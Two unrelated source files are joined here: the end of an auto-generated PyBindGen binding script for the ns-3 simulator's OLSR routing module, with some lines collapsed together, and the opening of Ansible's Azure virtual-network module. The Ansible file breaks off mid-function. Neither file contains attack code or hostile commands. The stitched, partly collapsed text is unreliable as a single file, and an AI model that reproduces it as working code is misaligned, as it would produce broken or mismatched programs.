    cls.add_method('FindAssociationTuple', 'ns3::olsr::AssociationTuple *', [param('ns3::Ipv4Address const &', 'gatewayAddr'), param('ns3::Ipv4Address const &', 'networkAddr'), param('ns3::Ipv4Mask const &', 'netmask')])
    ## olsr-state.h (module 'olsr'): ns3::olsr::DuplicateTuple * ns3::olsr::OlsrState::FindDuplicateTuple(ns3::Ipv4Address const & address, uint16_t sequenceNumber) [member function]
    cls.add_method('FindDuplicateTuple', 'ns3::olsr::DuplicateTuple *', [param('ns3::Ipv4Address const &', 'address'), param('uint16_t', 'sequenceNumber')])
    ## olsr-state.h (module 'olsr'): ns3::olsr::IfaceAssocTuple * ns3::olsr::OlsrState::FindIfaceAssocTuple(ns3::Ipv4Address const & ifaceAddr) [member function]
    cls.add_method('FindIfaceAssocTuple', 'ns3::olsr::IfaceAssocTuple *', [param('ns3::Ipv4Address const &', 'ifaceAddr')])
    ## olsr-state.h (module 'olsr'): ns3::olsr::IfaceAssocTuple const * ns3::olsr::OlsrState::FindIfaceAssocTuple(ns3::Ipv4Address const & ifaceAddr) const [member function]
    cls.add_method('FindIfaceAssocTuple', 'ns3::olsr::IfaceAssocTuple const *', [param('ns3::Ipv4Address const &', 'ifaceAddr')], is_const=True)
    ## olsr-state.h (module 'olsr'): ns3::olsr::LinkTuple * ns3::olsr::OlsrState::FindLinkTuple(ns3::Ipv4Address const & ifaceAddr) [member function]
    cls.add_method('FindLinkTuple', 'ns3::olsr::LinkTuple *', [param('ns3::Ipv4Address const &', 'ifaceAddr')])
    ## olsr-state.h (module 'olsr'): bool ns3::olsr::OlsrState::FindMprAddress(ns3::Ipv4Address const & address) [member function]
    cls.add_method('FindMprAddress', 'bool', [param('ns3::Ipv4Address const &', 'address')])
    ## olsr-state.h (module 'olsr'): ns3::olsr::MprSelectorTuple * ns3::olsr::OlsrState::FindMprSelectorTuple(ns3::Ipv4Address const & mainAddr) [member function]
    cls.add_method('FindMprSelectorTuple', 'ns3::olsr::MprSelectorTuple *', [param('ns3::Ipv4Address const &', 'mainAddr')])
    ## olsr-state.h (module 'olsr'): std::vector<ns3::Ipv4Address, std::allocator<ns3::Ipv4Address> > ns3::olsr::OlsrState::FindNeighborInterfaces(ns3::Ipv4Address const & neighborMainAddr) const [member function]
    cls.add_method('FindNeighborInterfaces', 'std::vector< ns3::Ipv4Address >', [param('ns3::Ipv4Address const &', 'neighborMainAddr')], is_const=True)
    ## olsr-state.h (module 'olsr'): ns3::olsr::NeighborTuple * ns3::olsr::OlsrState::FindNeighborTuple(ns3::Ipv4Address const & mainAddr) [member function]
    cls.add_method('FindNeighborTuple', 'ns3::olsr::NeighborTuple *', [param('ns3::Ipv4Address const &', 'mainAddr')])
    ## olsr-state.h (module 'olsr'): ns3::olsr::NeighborTuple * ns3::olsr::OlsrState::FindNeighborTuple(ns3::Ipv4Address const & mainAddr, uint8_t willingness) [member function]
    cls.add_method('FindNeighborTuple', 'ns3::olsr::NeighborTuple *', [param('ns3::Ipv4Address const &', 'mainAddr'), param('uint8_t', 'willingness')])
    ## olsr-state.h (module 'olsr'): ns3::olsr::TopologyTuple * ns3::olsr::OlsrState::FindNewerTopologyTuple(ns3::Ipv4Address const & lastAddr, uint16_t ansn) [member function]
    cls.add_method('FindNewerTopologyTuple', 'ns3::olsr::TopologyTuple *', [param('ns3::Ipv4Address const &', 'lastAddr'), param('uint16_t', 'ansn')])
    ## olsr-state.h (module 'olsr'): ns3::olsr::LinkTuple * ns3::olsr::OlsrState::FindSymLinkTuple(ns3::Ipv4Address const & ifaceAddr, ns3::Time time) [member function]
    cls.add_method('FindSymLinkTuple', 'ns3::olsr::LinkTuple *', [param('ns3::Ipv4Address const &', 'ifaceAddr'), param('ns3::Time', 'time')])
    ## olsr-state.h (module 'olsr'): ns3::olsr::NeighborTuple const * ns3::olsr::OlsrState::FindSymNeighborTuple(ns3::Ipv4Address const & mainAddr) const [member function]
    cls.add_method('FindSymNeighborTuple', 'ns3::olsr::NeighborTuple const *', [param('ns3::Ipv4Address const &', 'mainAddr')], is_const=True)
    ## olsr-state.h (module 'olsr'): ns3::olsr::TopologyTuple * ns3::olsr::OlsrState::FindTopologyTuple(ns3::Ipv4Address const & destAddr, ns3::Ipv4Address const & lastAddr) [member function]
    cls.add_method('FindTopologyTuple', 'ns3::olsr::TopologyTuple *', [param('ns3::Ipv4Address const &', 'destAddr'), param('ns3::Ipv4Address const &', 'lastAddr')])
    ## olsr-state.h (module 'olsr'): ns3::olsr::TwoHopNeighborTuple * ns3::olsr::OlsrState::FindTwoHopNeighborTuple(ns3::Ipv4Address const & neighbor, ns3::Ipv4Address const & twoHopNeighbor) [member function]
    cls.add_method('FindTwoHopNeighborTuple', 'ns3::olsr::TwoHopNeighborTuple *', [param('ns3::Ipv4Address const &', 'neighbor'), param('ns3::Ipv4Address const &', 'twoHopNeighbor')])
    ## olsr-state.h (module 'olsr'): ns3::olsr::AssociationSet const & ns3::olsr::OlsrState::GetAssociationSet() const [member function]
    cls.add_method('GetAssociationSet', 'ns3::olsr::AssociationSet const &', [], is_const=True)
    ## olsr-state.h (module 'olsr'): ns3::olsr::Associations const & ns3::olsr::OlsrState::GetAssociations() const [member function]
    cls.add_method('GetAssociations', 'ns3::olsr::Associations const &', [], is_const=True)
    ## olsr-state.h (module 'olsr'): ns3::olsr::IfaceAssocSet const & ns3::olsr::OlsrState::GetIfaceAssocSet() const [member function]
    cls.add_method('GetIfaceAssocSet', 'ns3::olsr::IfaceAssocSet const &', [], is_const=True)
    ## olsr-state.h (module 'olsr'): ns3::olsr::IfaceAssocSet & ns3::olsr::OlsrState::GetIfaceAssocSetMutable() [member function]
    cls.add_method('GetIfaceAssocSetMutable', 'ns3::olsr::IfaceAssocSet &', [])
    ## olsr-state.h (module 'olsr'): ns3::olsr::LinkSet const & ns3::olsr::OlsrState::GetLinks() const [member function]
    cls.add_method('GetLinks', 'ns3::olsr::LinkSet const &', [], is_const=True)
    ## olsr-state.h (module 'olsr'): ns3::olsr::MprSelectorSet const & ns3::olsr::OlsrState::GetMprSelectors() const [member function]
    cls.add_method('GetMprSelectors', 'ns3::olsr::MprSelectorSet const &', [], is_const=True)
    ## olsr-state.h (module 'olsr'): ns3::olsr::MprSet ns3::olsr::OlsrState::GetMprSet() const [member function]
    cls.add_method('GetMprSet', 'ns3::olsr::MprSet', [], is_const=True)
    ## olsr-state.h (module 'olsr'): ns3::olsr::NeighborSet const & ns3::olsr::OlsrState::GetNeighbors() const [member function]
    cls.add_method('GetNeighbors', 'ns3::olsr::NeighborSet const &', [], is_const=True)
    ## olsr-state.h (module 'olsr'): ns3::olsr::NeighborSet & ns3::olsr::OlsrState::GetNeighbors() [member function]
    cls.add_method('GetNeighbors', 'ns3::olsr::NeighborSet &', [])
    ## olsr-state.h (module 'olsr'): ns3::olsr::TopologySet const & ns3::olsr::OlsrState::GetTopologySet() const [member function]
    cls.add_method('GetTopologySet', 'ns3::olsr::TopologySet const &', [], is_const=True)
    ## olsr-state.h (module 'olsr'): ns3::olsr::TwoHopNeighborSet const & ns3::olsr::OlsrState::GetTwoHopNeighbors() const [member function]
    cls.add_method('GetTwoHopNeighbors', 'ns3::olsr::TwoHopNeighborSet const &', [], is_const=True)
    ## olsr-state.h (module 'olsr'): ns3::olsr::TwoHopNeighborSet & ns3::olsr::OlsrState::GetTwoHopNeighbors() [member function]
    cls.add_method('GetTwoHopNeighbors', 'ns3::olsr::TwoHopNeighborSet &', [])
    ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::InsertAssociation(ns3::olsr::Association const & tuple) [member function]
    cls.add_method('InsertAssociation', 'void', [param('ns3::olsr::Association const &', 'tuple')])
    ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::InsertAssociationTuple(ns3::olsr::AssociationTuple const & tuple) [member function]
    cls.add_method('InsertAssociationTuple', 'void', [param('ns3::olsr::AssociationTuple const &', 'tuple')])
    ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::InsertDuplicateTuple(ns3::olsr::DuplicateTuple const & tuple) [member function]
    cls.add_method('InsertDuplicateTuple', 'void', [param('ns3::olsr::DuplicateTuple const &', 'tuple')])
    ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::InsertIfaceAssocTuple(ns3::olsr::IfaceAssocTuple const & tuple) [member function]
    cls.add_method('InsertIfaceAssocTuple', 'void', [param('ns3::olsr::IfaceAssocTuple const &', 'tuple')])
    ## olsr-state.h (module 'olsr'): ns3::olsr::LinkTuple & ns3::olsr::OlsrState::InsertLinkTuple(ns3::olsr::LinkTuple const & tuple) [member function]
    cls.add_method('InsertLinkTuple', 'ns3::olsr::LinkTuple &', [param('ns3::olsr::LinkTuple const &', 'tuple')])
    ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::InsertMprSelectorTuple(ns3::olsr::MprSelectorTuple const & tuple) [member function]
    cls.add_method('InsertMprSelectorTuple', 'void', [param('ns3::olsr::MprSelectorTuple const &', 'tuple')])
    ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::InsertNeighborTuple(ns3::olsr::NeighborTuple const & tuple) [member function]
    cls.add_method('InsertNeighborTuple', 'void', [param('ns3::olsr::NeighborTuple const &', 'tuple')])
    ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::InsertTopologyTuple(ns3::olsr::TopologyTuple const & tuple) [member function]
    cls.add_method('InsertTopologyTuple', 'void', [param('ns3::olsr::TopologyTuple const &', 'tuple')])
    ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::InsertTwoHopNeighborTuple(ns3::olsr::TwoHopNeighborTuple const & tuple) [member function]
    cls.add_method('InsertTwoHopNeighborTuple', 'void', [param('ns3::olsr::TwoHopNeighborTuple const &', 'tuple')])
    ## olsr-state.h (module 'olsr'): std::string ns3::olsr::OlsrState::PrintMprSelectorSet() const [member function]
    cls.add_method('PrintMprSelectorSet', 'std::string', [], is_const=True)
    ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::SetMprSet(ns3::olsr::MprSet mprSet) [member function]
    cls.add_method('SetMprSet', 'void', [param('ns3::olsr::MprSet', 'mprSet')])
    return

def register_Ns3OlsrPacketHeader_methods(root_module, cls):
    # Bindings for ns3::olsr::PacketHeader: the ns3::Header virtual interface
    # (Serialize/Deserialize/Print/GetSerializedSize/GetInstanceTypeId) plus
    # packet length / sequence number accessors.
    cls.add_output_stream_operator()
    ## olsr-header.h (module 'olsr'): ns3::olsr::PacketHeader::PacketHeader(ns3::olsr::PacketHeader const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::olsr::PacketHeader const &', 'arg0')])
    ## olsr-header.h (module 'olsr'): ns3::olsr::PacketHeader::PacketHeader() [constructor]
    cls.add_constructor([])
    ## olsr-header.h (module 'olsr'): uint32_t ns3::olsr::PacketHeader::Deserialize(ns3::Buffer::Iterator start) [member function]
    cls.add_method('Deserialize', 'uint32_t', [param('ns3::Buffer::Iterator', 'start')], is_virtual=True)
    ## olsr-header.h (module 'olsr'): ns3::TypeId ns3::olsr::PacketHeader::GetInstanceTypeId() const [member function]
    cls.add_method('GetInstanceTypeId', 'ns3::TypeId', [], is_const=True, is_virtual=True)
    ## olsr-header.h (module 'olsr'): uint16_t ns3::olsr::PacketHeader::GetPacketLength() const [member function]
    cls.add_method('GetPacketLength', 'uint16_t', [], is_const=True)
    ## olsr-header.h (module 'olsr'): uint16_t ns3::olsr::PacketHeader::GetPacketSequenceNumber() const [member function]
    cls.add_method('GetPacketSequenceNumber', 'uint16_t', [], is_const=True)
    ## olsr-header.h (module 'olsr'): uint32_t ns3::olsr::PacketHeader::GetSerializedSize() const [member function]
    cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True, is_virtual=True)
    ## olsr-header.h (module 'olsr'): static ns3::TypeId ns3::olsr::PacketHeader::GetTypeId() [member function]
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    ## olsr-header.h (module 'olsr'): void ns3::olsr::PacketHeader::Print(std::ostream & os) const [member function]
    cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True, is_virtual=True)
    ## olsr-header.h (module 'olsr'): void ns3::olsr::PacketHeader::Serialize(ns3::Buffer::Iterator start) const [member function]
    cls.add_method('Serialize', 'void', [param('ns3::Buffer::Iterator', 'start')], is_const=True, is_virtual=True)
    ## olsr-header.h (module 'olsr'): void ns3::olsr::PacketHeader::SetPacketLength(uint16_t length) [member function]
    cls.add_method('SetPacketLength', 'void', [param('uint16_t', 'length')])
    ## olsr-header.h (module 'olsr'): void ns3::olsr::PacketHeader::SetPacketSequenceNumber(uint16_t seqnum) [member function]
    cls.add_method('SetPacketSequenceNumber', 'void', [param('uint16_t', 'seqnum')])
    return

def register_Ns3OlsrRoutingProtocol_methods(root_module, cls):
    # Bindings for ns3::olsr::RoutingProtocol: public configuration API plus
    # the protected/private Ipv4RoutingProtocol virtual overrides
    # (RouteInput/RouteOutput, Notify* callbacks, lifecycle hooks).
    ## olsr-routing-protocol.h (module 'olsr'): ns3::olsr::RoutingProtocol::RoutingProtocol(ns3::olsr::RoutingProtocol const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::olsr::RoutingProtocol const &', 'arg0')])
    ## olsr-routing-protocol.h (module 'olsr'): ns3::olsr::RoutingProtocol::RoutingProtocol() [constructor]
    cls.add_constructor([])
    ## olsr-routing-protocol.h (module 'olsr'): void ns3::olsr::RoutingProtocol::AddHostNetworkAssociation(ns3::Ipv4Address networkAddr, ns3::Ipv4Mask netmask) [member function]
    cls.add_method('AddHostNetworkAssociation', 'void', [param('ns3::Ipv4Address', 'networkAddr'), param('ns3::Ipv4Mask', 'netmask')])
    ## olsr-routing-protocol.h (module 'olsr'): int64_t ns3::olsr::RoutingProtocol::AssignStreams(int64_t stream) [member function]
    cls.add_method('AssignStreams', 'int64_t', [param('int64_t', 'stream')])
    ## olsr-routing-protocol.h (module 'olsr'): void ns3::olsr::RoutingProtocol::Dump() [member function]
    cls.add_method('Dump', 'void', [])
    ## olsr-routing-protocol.h (module 'olsr'): std::set<unsigned int, std::less<unsigned int>, std::allocator<unsigned int> > ns3::olsr::RoutingProtocol::GetInterfaceExclusions() const [member function]
    cls.add_method('GetInterfaceExclusions', 'std::set< unsigned int >', [], is_const=True)
    ## olsr-routing-protocol.h (module 'olsr'): ns3::Ptr<const ns3::Ipv4StaticRouting> ns3::olsr::RoutingProtocol::GetRoutingTableAssociation() const [member function]
    cls.add_method('GetRoutingTableAssociation', 'ns3::Ptr< ns3::Ipv4StaticRouting const >', [], is_const=True)
    ## olsr-routing-protocol.h (module 'olsr'): std::vector<ns3::olsr::RoutingTableEntry,std::allocator<ns3::olsr::RoutingTableEntry> > ns3::olsr::RoutingProtocol::GetRoutingTableEntries() const [member function]
    cls.add_method('GetRoutingTableEntries', 'std::vector< ns3::olsr::RoutingTableEntry >', [], is_const=True)
    ## olsr-routing-protocol.h (module 'olsr'): static ns3::TypeId ns3::olsr::RoutingProtocol::GetTypeId() [member function]
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    ## olsr-routing-protocol.h (module 'olsr'): void ns3::olsr::RoutingProtocol::RemoveHostNetworkAssociation(ns3::Ipv4Address networkAddr, ns3::Ipv4Mask netmask) [member function]
    cls.add_method('RemoveHostNetworkAssociation', 'void', [param('ns3::Ipv4Address', 'networkAddr'), param('ns3::Ipv4Mask', 'netmask')])
    ## olsr-routing-protocol.h (module 'olsr'): void ns3::olsr::RoutingProtocol::SetInterfaceExclusions(std::set<unsigned int, std::less<unsigned int>, std::allocator<unsigned int> > exceptions) [member function]
    cls.add_method('SetInterfaceExclusions', 'void', [param('std::set< unsigned int >', 'exceptions')])
    ## olsr-routing-protocol.h (module 'olsr'): void ns3::olsr::RoutingProtocol::SetMainInterface(uint32_t interface) [member function]
    cls.add_method('SetMainInterface', 'void', [param('uint32_t', 'interface')])
    ## olsr-routing-protocol.h (module 'olsr'): void ns3::olsr::RoutingProtocol::SetRoutingTableAssociation(ns3::Ptr<ns3::Ipv4StaticRouting> routingTable) [member function]
    cls.add_method('SetRoutingTableAssociation', 'void', [param('ns3::Ptr< ns3::Ipv4StaticRouting >', 'routingTable')])
    ## olsr-routing-protocol.h (module 'olsr'): void ns3::olsr::RoutingProtocol::DoInitialize() [member function]
    cls.add_method('DoInitialize', 'void', [], visibility='protected', is_virtual=True)
    ## olsr-routing-protocol.h (module 'olsr'): void ns3::olsr::RoutingProtocol::DoDispose() [member function]
    cls.add_method('DoDispose', 'void', [], visibility='private', is_virtual=True)
    ## olsr-routing-protocol.h (module 'olsr'): void ns3::olsr::RoutingProtocol::NotifyAddAddress(uint32_t interface, ns3::Ipv4InterfaceAddress address) [member function]
    cls.add_method('NotifyAddAddress', 'void', [param('uint32_t', 'interface'), param('ns3::Ipv4InterfaceAddress', 'address')], visibility='private', is_virtual=True)
    ## olsr-routing-protocol.h (module 'olsr'): void ns3::olsr::RoutingProtocol::NotifyInterfaceDown(uint32_t interface) [member function]
    cls.add_method('NotifyInterfaceDown', 'void', [param('uint32_t', 'interface')], visibility='private', is_virtual=True)
    ## olsr-routing-protocol.h (module 'olsr'): void ns3::olsr::RoutingProtocol::NotifyInterfaceUp(uint32_t interface) [member function]
    cls.add_method('NotifyInterfaceUp', 'void', [param('uint32_t', 'interface')], visibility='private', is_virtual=True)
    ## olsr-routing-protocol.h (module 'olsr'): void ns3::olsr::RoutingProtocol::NotifyRemoveAddress(uint32_t interface, ns3::Ipv4InterfaceAddress address) [member function]
    cls.add_method('NotifyRemoveAddress', 'void', [param('uint32_t', 'interface'), param('ns3::Ipv4InterfaceAddress', 'address')], visibility='private', is_virtual=True)
    ## olsr-routing-protocol.h (module 'olsr'): void ns3::olsr::RoutingProtocol::PrintRoutingTable(ns3::Ptr<ns3::OutputStreamWrapper> stream, ns3::Time::Unit unit=::ns3::Time::S) const [member function]
    cls.add_method('PrintRoutingTable', 'void', [param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream'), param('ns3::Time::Unit', 'unit', default_value='::ns3::Time::S')], is_const=True, visibility='private', is_virtual=True)
    ## olsr-routing-protocol.h (module 'olsr'): bool ns3::olsr::RoutingProtocol::RouteInput(ns3::Ptr<const ns3::Packet> p, ns3::Ipv4Header const & header, ns3::Ptr<const ns3::NetDevice> idev, ns3::Callback<void,ns3::Ptr<ns3::Ipv4Route>,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ucb, ns3::Callback<void,ns3::Ptr<ns3::Ipv4MulticastRoute>,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> mcb, ns3::Callback<void,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,unsigned int,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> lcb, ns3::Callback<void,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,ns3::Socket::SocketErrno,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ecb) [member function]
    cls.add_method('RouteInput', 'bool', [param('ns3::Ptr< ns3::Packet const >', 'p'), param('ns3::Ipv4Header const &', 'header'), param('ns3::Ptr< ns3::NetDevice const >', 'idev'), param('ns3::Callback< void, ns3::Ptr< ns3::Ipv4Route >, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ucb'), param('ns3::Callback< void, ns3::Ptr< ns3::Ipv4MulticastRoute >, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'mcb'), param('ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'lcb'), param('ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::Socket::SocketErrno, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ecb')], visibility='private', is_virtual=True)
    ## olsr-routing-protocol.h (module 'olsr'): ns3::Ptr<ns3::Ipv4Route> ns3::olsr::RoutingProtocol::RouteOutput(ns3::Ptr<ns3::Packet> p, ns3::Ipv4Header const & header, ns3::Ptr<ns3::NetDevice> oif, ns3::Socket::SocketErrno & sockerr) [member function]
    cls.add_method('RouteOutput', 'ns3::Ptr< ns3::Ipv4Route >', [param('ns3::Ptr< ns3::Packet >', 'p'), param('ns3::Ipv4Header const &', 'header'), param('ns3::Ptr< ns3::NetDevice >', 'oif'), param('ns3::Socket::SocketErrno &', 'sockerr')], visibility='private', is_virtual=True)
    ## olsr-routing-protocol.h (module 'olsr'): void ns3::olsr::RoutingProtocol::SetIpv4(ns3::Ptr<ns3::Ipv4> ipv4) [member function]
    cls.add_method('SetIpv4', 'void', [param('ns3::Ptr< ns3::Ipv4 >', 'ipv4')], visibility='private', is_virtual=True)
    return

def register_Ns3OlsrRoutingTableEntry_methods(root_module, cls):
    # Bindings for ns3::olsr::RoutingTableEntry: constructors plus its four
    # public fields (destination, next hop, interface index, distance).
    ## olsr-routing-protocol.h (module 'olsr'): ns3::olsr::RoutingTableEntry::RoutingTableEntry(ns3::olsr::RoutingTableEntry const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::olsr::RoutingTableEntry const &', 'arg0')])
    ## olsr-routing-protocol.h (module 'olsr'): ns3::olsr::RoutingTableEntry::RoutingTableEntry() [constructor]
    cls.add_constructor([])
    ## olsr-routing-protocol.h (module 'olsr'): ns3::olsr::RoutingTableEntry::destAddr [variable]
    cls.add_instance_attribute('destAddr', 'ns3::Ipv4Address', is_const=False)
    ## olsr-routing-protocol.h (module 'olsr'): ns3::olsr::RoutingTableEntry::distance [variable]
    cls.add_instance_attribute('distance', 'uint32_t', is_const=False)
    ## olsr-routing-protocol.h (module 'olsr'): ns3::olsr::RoutingTableEntry::interface [variable]
    cls.add_instance_attribute('interface', 'uint32_t', is_const=False)
    ## olsr-routing-protocol.h (module 'olsr'): ns3::olsr::RoutingTableEntry::nextAddr [variable]
    cls.add_instance_attribute('nextAddr', 'ns3::Ipv4Address', is_const=False)
    return

def register_Ns3OlsrTopologyTuple_methods(root_module, cls):
    # Bindings for ns3::olsr::TopologyTuple: stream/equality operators,
    # constructors and public fields.
    cls.add_output_stream_operator()
    cls.add_binary_comparison_operator('==')
    ## olsr-repositories.h (module 'olsr'): ns3::olsr::TopologyTuple::TopologyTuple() [constructor]
    cls.add_constructor([])
    ## olsr-repositories.h (module 'olsr'): ns3::olsr::TopologyTuple::TopologyTuple(ns3::olsr::TopologyTuple const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::olsr::TopologyTuple const &', 'arg0')])
    ## olsr-repositories.h (module 'olsr'): ns3::olsr::TopologyTuple::destAddr [variable]
    cls.add_instance_attribute('destAddr', 'ns3::Ipv4Address', is_const=False)
    ## olsr-repositories.h (module 'olsr'): ns3::olsr::TopologyTuple::expirationTime [variable]
    cls.add_instance_attribute('expirationTime', 'ns3::Time', is_const=False)
    ## olsr-repositories.h (module 'olsr'): ns3::olsr::TopologyTuple::lastAddr [variable]
    cls.add_instance_attribute('lastAddr', 'ns3::Ipv4Address', is_const=False)
    ## olsr-repositories.h (module 'olsr'): ns3::olsr::TopologyTuple::sequenceNumber [variable]
    cls.add_instance_attribute('sequenceNumber', 'uint16_t', is_const=False)
    return

def register_Ns3OlsrTwoHopNeighborTuple_methods(root_module, cls):
    # Bindings for ns3::olsr::TwoHopNeighborTuple (continues past this chunk).
    cls.add_output_stream_operator()
    cls.add_binary_comparison_operator('==')
    ## olsr-repositories.h (module 'olsr'): ns3::olsr::TwoHopNeighborTuple::TwoHopNeighborTuple() [constructor]
    cls.add_constructor([])
    ## olsr-repositories.h (module 'olsr'): ns3::olsr::TwoHopNeighborTuple::TwoHopNeighborTuple(ns3::olsr::TwoHopNeighborTuple const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::olsr::TwoHopNeighborTuple const &', 'arg0')])
    ## olsr-repositories.h (module 'olsr'): ns3::olsr::TwoHopNeighborTuple::expirationTime [variable]
    cls.add_instance_attribute('expirationTime', 'ns3::Time', is_const=False)
    ## olsr-repositories.h (module 'olsr'): ns3::olsr::TwoHopNeighborTuple::neighborMainAddr [variable]
    cls.add_instance_attribute('neighborMainAddr', 
'ns3::Ipv4Address', is_const=False) ## olsr-repositories.h (module 'olsr'): ns3::olsr::TwoHopNeighborTuple::twoHopNeighborAddr [variable] cls.add_instance_attribute('twoHopNeighborAddr', 'ns3::Ipv4Address', is_const=False) return def register_functions(root_module): module = root_module register_functions_ns3_FatalImpl(module.get_submodule('FatalImpl'), root_module) register_functions_ns3_Hash(module.get_submodule('Hash'), root_module) register_functions_ns3_TracedValueCallback(module.get_submodule('TracedValueCallback'), root_module) register_functions_ns3_olsr(module.get_submodule('olsr'), root_module) return def register_functions_ns3_FatalImpl(module, root_module): return def register_functions_ns3_Hash(module, root_module): register_functions_ns3_Hash_Function(module.get_submodule('Function'), root_module) return def register_functions_ns3_Hash_Function(module, root_module): return def register_functions_ns3_TracedValueCallback(module, root_module): return def register_functions_ns3_olsr(module, root_module): ## olsr-header.h (module 'olsr'): extern double ns3::olsr::EmfToSeconds(uint8_t emf) [free function] module.add_function('EmfToSeconds', 'double', [param('uint8_t', 'emf')]) ## olsr-header.h (module 'olsr'): extern uint8_t ns3::olsr::SecondsToEmf(double seconds) [free function] module.add_function('SecondsToEmf', 'uint8_t', [param('double', 'seconds')]) return def main(): out = FileCodeSink(sys.stdout) root_module = module_init() register_types(root_module) register_methods(root_module) register_functions(root_module) root_module.generate(out) if __name__ == '__main__': main()
gpl-2.0
benthomasson/ansible
lib/ansible/modules/cloud/azure/azure_rm_virtualnetwork.py
10
13313
#!/usr/bin/python
#
# Copyright (c) 2016 Matt Davis, <mdavis@ansible.com>
#                    Chris Houseknecht, <house@redhat.com>
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)

from __future__ import absolute_import, division, print_function
__metaclass__ = type


ANSIBLE_METADATA = {'metadata_version': '1.0',
                    'status': ['preview'],
                    'supported_by': 'curated'}


DOCUMENTATION = '''
---
module: azure_rm_virtualnetwork
version_added: "2.1"
short_description: Manage Azure virtual networks.
description:
    - Create, update or delete a virtual networks. Allows setting and updating the available IPv4 address ranges
      and setting custom DNS servers. Use the azure_rm_subnet module to associate subnets with a virtual network.
options:
    resource_group:
        description:
            - name of resource group.
        required: true
    address_prefixes_cidr:
        description:
            - List of IPv4 address ranges where each is formatted using CIDR notation. Required when creating
              a new virtual network or using purge_address_prefixes.
        aliases:
            - address_prefixes
        default: null
        required: false
    dns_servers:
        description:
            - Custom list of DNS servers. Maximum length of two. The first server in the list will be treated
              as the Primary server. This is an explicit list. Existing DNS servers will be replaced with the
              specified list. Use the purge_dns_servers option to remove all custom DNS servers and revert to
              default Azure servers.
        default: null
        required: false
    location:
        description:
            - Valid azure location. Defaults to location of the resource group.
        default: resource_group location
        required: false
    name:
        description:
            - name of the virtual network.
        required: true
    purge_address_prefixes:
        description:
            - Use with state present to remove any existing address_prefixes.
        default: false
    purge_dns_servers:
        description:
            - Use with state present to remove existing DNS servers, reverting to default Azure servers. Mutually
              exclusive with dns_servers.
        default: false
        required: false
    state:
        description:
            - Assert the state of the virtual network. Use 'present' to create or update and
              'absent' to delete.
        default: present
        choices:
            - absent
            - present
        required: false

extends_documentation_fragment:
    - azure
    - azure_tags

author:
    - "Chris Houseknecht (@chouseknecht)"
    - "Matt Davis (@nitzmahone)"

'''

EXAMPLES = '''
    - name: Create a virtual network
      azure_rm_virtualnetwork:
        name: foobar
        resource_group: Testing
        address_prefixes_cidr:
            - "10.1.0.0/16"
            - "172.100.0.0/16"
        dns_servers:
            - "127.0.0.1"
            - "127.0.0.2"
        tags:
            testing: testing
            delete: on-exit

    - name: Delete a virtual network
      azure_rm_virtualnetwork:
        name: foobar
        resource_group: Testing
        state: absent
'''

RETURN = '''
state:
    description: Current state of the virtual network.
    returned: always
    type: dict
    sample: {
        "address_prefixes": [
            "10.1.0.0/16",
            "172.100.0.0/16"
        ],
        "dns_servers": [
            "127.0.0.1",
            "127.0.0.3"
        ],
        "etag": 'W/"0712e87c-f02f-4bb3-8b9e-2da0390a3886"',
        "id": "/subscriptions/XXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXX/resourceGroups/Testing/providers/Microsoft.Network/virtualNetworks/my_test_network",
        "location": "eastus",
        "name": "my_test_network",
        "provisioning_state": "Succeeded",
        "tags": null,
        "type": "Microsoft.Network/virtualNetworks"
    }
'''

try:
    from msrestazure.azure_exceptions import CloudError
    from azure.mgmt.network.models import VirtualNetwork, AddressSpace, DhcpOptions
except ImportError:
    # This is handled in azure_rm_common
    pass

from ansible.module_utils.azure_rm_common import AzureRMModuleBase, CIDR_PATTERN


def virtual_network_to_dict(vnet):
    '''
    Convert a virtual network object to a dict.

    The 'dns_servers' and 'address_prefixes' keys are only present when the
    vnet actually carries those settings, which is why callers use
    results.get(...) for them.

    :param vnet: VirtualNet object
    :return: dict
    '''
    results = dict(
        id=vnet.id,
        name=vnet.name,
        location=vnet.location,
        type=vnet.type,
        tags=vnet.tags,
        provisioning_state=vnet.provisioning_state,
        etag=vnet.etag
    )
    if vnet.dhcp_options and len(vnet.dhcp_options.dns_servers) > 0:
        results['dns_servers'] = []
        for server in vnet.dhcp_options.dns_servers:
